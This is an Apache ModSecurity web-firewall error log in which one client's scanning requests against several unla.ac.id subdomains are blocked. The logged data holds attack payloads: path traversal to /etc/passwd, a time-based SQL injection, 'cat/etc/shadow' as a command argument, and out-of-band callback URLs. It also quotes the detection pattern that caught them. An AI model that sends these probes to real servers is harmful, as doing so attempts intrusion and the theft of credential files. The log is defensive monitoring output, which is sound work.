[Tue Aug 29 11:34:15.347668 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg95tgosetofbr8.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg95tgosetofbr8.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAAPDoNgAAAAP"]
[Tue Aug 29 11:34:15.348444 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgmdexsnsr98byt.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgmdexsnsr98byt.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAAQKOuAAAAAs"]
[Tue Aug 29 11:34:15.349050 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgcm667x544qfts.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgcm667x544qfts.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAARjjWMAAAAL"]
[Tue Aug 29 11:34:15.350126 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAASI0BsAAAAG"]
[Tue Aug 29 11:34:15.350247 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAASS7@kAAAAY"]
[Tue Aug 29 11:34:15.369488 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAAShCWcAAAAi"]
[Tue Aug 29 11:34:15.372659 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAASEJUIAAAAE"]
[Tue Aug 29 11:34:15.380907 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11R8Co-f0AAASGMuEAAAAA"]
[Tue Aug 29 11:34:15.381026 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgpa4nx1ocdjnw5.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgpa4nx1ocdjnw5.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11R8Co-f0AAAPDoNkAAAAP"]
[Tue Aug 29 11:34:16.327402 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAAPDoNsAAAAP"]
[Tue Aug 29 11:34:16.346851 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASGMuMAAAAA"]
[Tue Aug 29 11:34:16.347141 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASGMuMAAAAA"]
[Tue Aug 29 11:34:16.371597 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAAPDoN0AAAAP"]
[Tue Aug 29 11:34:16.372138 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAARjjWgAAAAL"]
[Tue Aug 29 11:34:16.372645 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAASLqEIAAAAM"]
[Tue Aug 29 11:34:16.373238 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAASVoIwAAAAe"]
[Tue Aug 29 11:34:16.385030 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAASI0CAAAAAG"]
[Tue Aug 29 11:34:16.387164 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "ft.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAAShCWsAAAAi"]
[Tue Aug 29 11:34:16.387197 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "ft.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAAShCWsAAAAi"]
[Tue Aug 29 11:34:16.392723 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "informatika.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASLqEMAAAAM"]
[Tue Aug 29 11:34:16.392762 2023] [:error] [pid 1163] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "informatika.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASLqEMAAAAM"]
[Tue Aug 29 11:34:16.392831 2023] [:error] [pid 1173] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAASVoI0AAAAe"]
[Tue Aug 29 11:34:16.393145 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgxb98azruyurhj.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgxb98azruyurhj.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/ui/vcav-bootstrap/rest/vcav-providers/provider-logo"] [unique_id "ZO11SMCo-f0AAARjjWkAAAAL"]
[Tue Aug 29 11:34:16.395152 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11SMCo-f0AAASHh70AAAAD"]
[Tue Aug 29 11:34:16.397348 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "journal.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAAPDoN4AAAAP"]
[Tue Aug 29 11:34:16.397434 2023] [:error] [pid 963] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "journal.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAAPDoN4AAAAP"]
[Tue Aug 29 11:34:16.404528 2023] [:error] [pid 1160] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAASI0CEAAAAG"]
[Tue Aug 29 11:34:16.404849 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/dummy"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11SMCo-f0AAARdiP8AAAAK"]
[Tue Aug 29 11:34:16.411837 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "pusatbahasa.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASGMuYAAAAA"]
[Tue Aug 29 11:34:16.411886 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "pusatbahasa.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11SMCo-f0AAASGMuYAAAAA"]
[Tue Aug 29 11:34:17.328668 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:i_like_gogits. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:i_like_gogits: ../../../../etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11ScCo-f0AAASEJUcAAAAE"]
[Tue Aug 29 11:34:17.339069 2023] [:error] [pid 1162] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAASK4f4AAAAI"]
[Tue Aug 29 11:34:17.361019 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAARdiQEAAAAK"]
[Tue Aug 29 11:34:17.376210 2023] [:error] [pid 1159] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAASHh8AAAAAD"]
[Tue Aug 29 11:34:17.380649 2023] [:error] [pid 1158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:cmd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:cmd: cat/etc/shadow"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/crowd/plugins/servlet/exp"] [unique_id "ZO11ScCo-f0AAASGMukAAAAA"]
[Tue Aug 29 11:34:17.381374 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23 found within TX:1: example.com/?x&v=1%22 AND (SELECT 1780 FROM (SELECT(SLEEP(6)))uPaz)%23"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11ScCo-f0AAARdiQIAAAAK"]
[Tue Aug 29 11:34:17.403927 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: XML parser error: XML: Failed parsing document. [hostname "www.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11ScCo-f0AAASS7-MAAAAY"]
[Tue Aug 29 11:34:17.403967 2023] [:error] [pid 1170] [client 143.42.78.27] ModSecurity: Access denied with code 400 (phase 2). Match of "eq 0" against "REQBODY_ERROR" required. [file "/etc/modsecurity/modsecurity.conf"] [line "54"] [id "200001"] [msg "Failed to parse request body."] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [hostname "www.unla.ac.id"] [uri "/getcfg.php"] [unique_id "ZO11ScCo-f0AAASS7-MAAAAY"]
